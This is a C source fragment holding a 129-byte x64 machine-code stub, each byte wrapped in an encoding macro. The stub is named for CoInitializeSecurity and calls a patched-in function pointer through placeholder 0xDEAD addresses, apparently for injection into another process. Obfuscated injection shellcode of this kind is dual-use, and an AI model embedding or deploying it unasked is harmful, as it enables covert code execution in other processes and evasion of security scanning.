BYTE aCoInitializeSecurityX64[129] = {
  X_BYTE_ENC(0x48,0x0000), X_BYTE_ENC(0x81,0x0001), X_BYTE_ENC(0xEC,0x0002), X_BYTE_ENC(0x88,0x0003),
  X_BYTE_ENC(0x00,0x0004), X_BYTE_ENC(0x00,0x0005), X_BYTE_ENC(0x00,0x0006), X_BYTE_ENC(0x48,0x0007),
  X_BYTE_ENC(0x8B,0x0008), X_BYTE_ENC(0x84,0x0009), X_BYTE_ENC(0x24,0x000A), X_BYTE_ENC(0x88,0x000B),
  X_BYTE_ENC(0x00,0x000C), X_BYTE_ENC(0x00,0x000D), X_BYTE_ENC(0x00,0x000E), X_BYTE_ENC(0x48,0x000F),
  X_BYTE_ENC(0x89,0x0010), X_BYTE_ENC(0x44,0x0011), X_BYTE_ENC(0x24,0x0012), X_BYTE_ENC(0x50,0x0013),
  X_BYTE_ENC(0x48,0x0014), X_BYTE_ENC(0x8B,0x0015), X_BYTE_ENC(0x84,0x0016), X_BYTE_ENC(0x24,0x0017),
  X_BYTE_ENC(0xD0,0x0018), X_BYTE_ENC(0x00,0x0019), X_BYTE_ENC(0x00,0x001A), X_BYTE_ENC(0x00,0x001B),
  X_BYTE_ENC(0x48,0x001C), X_BYTE_ENC(0x89,0x001D), X_BYTE_ENC(0x44,0x001E), X_BYTE_ENC(0x24,0x001F),
  X_BYTE_ENC(0x48,0x0020), X_BYTE_ENC(0x48,0x0021), X_BYTE_ENC(0x8B,0x0022), X_BYTE_ENC(0x84,0x0023),
  X_BYTE_ENC(0x24,0x0024), X_BYTE_ENC(0xC8,0x0025), X_BYTE_ENC(0x00,0x0026), X_BYTE_ENC(0x00,0x0027),
  X_BYTE_ENC(0x00,0x0028), X_BYTE_ENC(0x48,0x0029), X_BYTE_ENC(0x89,0x002A), X_BYTE_ENC(0x44,0x002B),
  X_BYTE_ENC(0x24,0x002C), X_BYTE_ENC(0x40,0x002D), X_BYTE_ENC(0x48,0x002E), X_BYTE_ENC(0x8B,0x002F),
  X_BYTE_ENC(0x84,0x0030), X_BYTE_ENC(0x24,0x0031), X_BYTE_ENC(0xC0,0x0032), X_BYTE_ENC(0x00,0x0033),
  X_BYTE_ENC(0x00,0x0034), X_BYTE_ENC(0x00,0x0035), X_BYTE_ENC(0x48,0x0036), X_BYTE_ENC(0x89,0x0037),
  X_BYTE_ENC(0x44,0x0038), X_BYTE_ENC(0x24,0x0039), X_BYTE_ENC(0x38,0x003A), X_BYTE_ENC(0x48,0x003B),
  X_BYTE_ENC(0x8B,0x003C), X_BYTE_ENC(0x84,0x003D), X_BYTE_ENC(0x24,0x003E), X_BYTE_ENC(0xB8,0x003F),
  X_BYTE_ENC(0x00,0x0040), X_BYTE_ENC(0x00,0x0041), X_BYTE_ENC(0x00,0x0042), X_BYTE_ENC(0x48,0x0043),
  X_BYTE_ENC(0x89,0x0044), X_BYTE_ENC(0x44,0x0045), X_BYTE_ENC(0x24,0x0046), X_BYTE_ENC(0x30,0x0047),
  X_BYTE_ENC(0x48,0x0048), X_BYTE_ENC(0x8B,0x0049), X_BYTE_ENC(0x84,0x004A), X_BYTE_ENC(0x24,0x004B),
  X_BYTE_ENC(0xB0,0x004C), X_BYTE_ENC(0x00,0x004D), X_BYTE_ENC(0x00,0x004E), X_BYTE_ENC(0x00,0x004F),
  X_BYTE_ENC(0x48,0x0050), X_BYTE_ENC(0x89,0x0051), X_BYTE_ENC(0x44,0x0052), X_BYTE_ENC(0x24,0x0053),
  X_BYTE_ENC(0x28,0x0054), X_BYTE_ENC(0x4C,0x0055), X_BYTE_ENC(0x89,0x0056), X_BYTE_ENC(0x4C,0x0057),
  X_BYTE_ENC(0x24,0x0058), X_BYTE_ENC(0x20,0x0059), X_BYTE_ENC(0x4D,0x005A), X_BYTE_ENC(0x8B,0x005B),
  X_BYTE_ENC(0xC8,0x005C), X_BYTE_ENC(0x4C,0x005D), X_BYTE_ENC(0x8B,0x005E), X_BYTE_ENC(0xC2,0x005F),
  X_BYTE_ENC(0x48,0x0060), X_BYTE_ENC(0x8B,0x0061), X_BYTE_ENC(0xD1,0x0062), X_BYTE_ENC(0x48,0x0063),
  X_BYTE_ENC(0xB9,0x0064), X_BYTE_ENC(0x01,0x0065), X_BYTE_ENC(0x00,0x0066), X_BYTE_ENC(0xAD,0x0067),
  X_BYTE_ENC(0xDE,0x0068), X_BYTE_ENC(0x01,0x0069), X_BYTE_ENC(0x00,0x006A), X_BYTE_ENC(0xAD,0x006B),
  X_BYTE_ENC(0xDE,0x006C), X_BYTE_ENC(0x48,0x006D), X_BYTE_ENC(0xB8,0x006E), X_BYTE_ENC(0x02,0x006F),
  X_BYTE_ENC(0x00,0x0070), X_BYTE_ENC(0xAD,0x0071), X_BYTE_ENC(0xDE,0x0072), X_BYTE_ENC(0x02,0x0073),
  X_BYTE_ENC(0x00,0x0074), X_BYTE_ENC(0xAD,0x0075), X_BYTE_ENC(0xDE,0x0076), X_BYTE_ENC(0xFF,0x0077),
  X_BYTE_ENC(0xD0,0x0078), X_BYTE_ENC(0x48,0x0079), X_BYTE_ENC(0x81,0x007A), X_BYTE_ENC(0xC4,0x007B),
  X_BYTE_ENC(0x88,0x007C), X_BYTE_ENC(0x00,0x007D), X_BYTE_ENC(0x00,0x007E), X_BYTE_ENC(0x00,0x007F),
  X_BYTE_ENC(0xC3,0x0080)
};
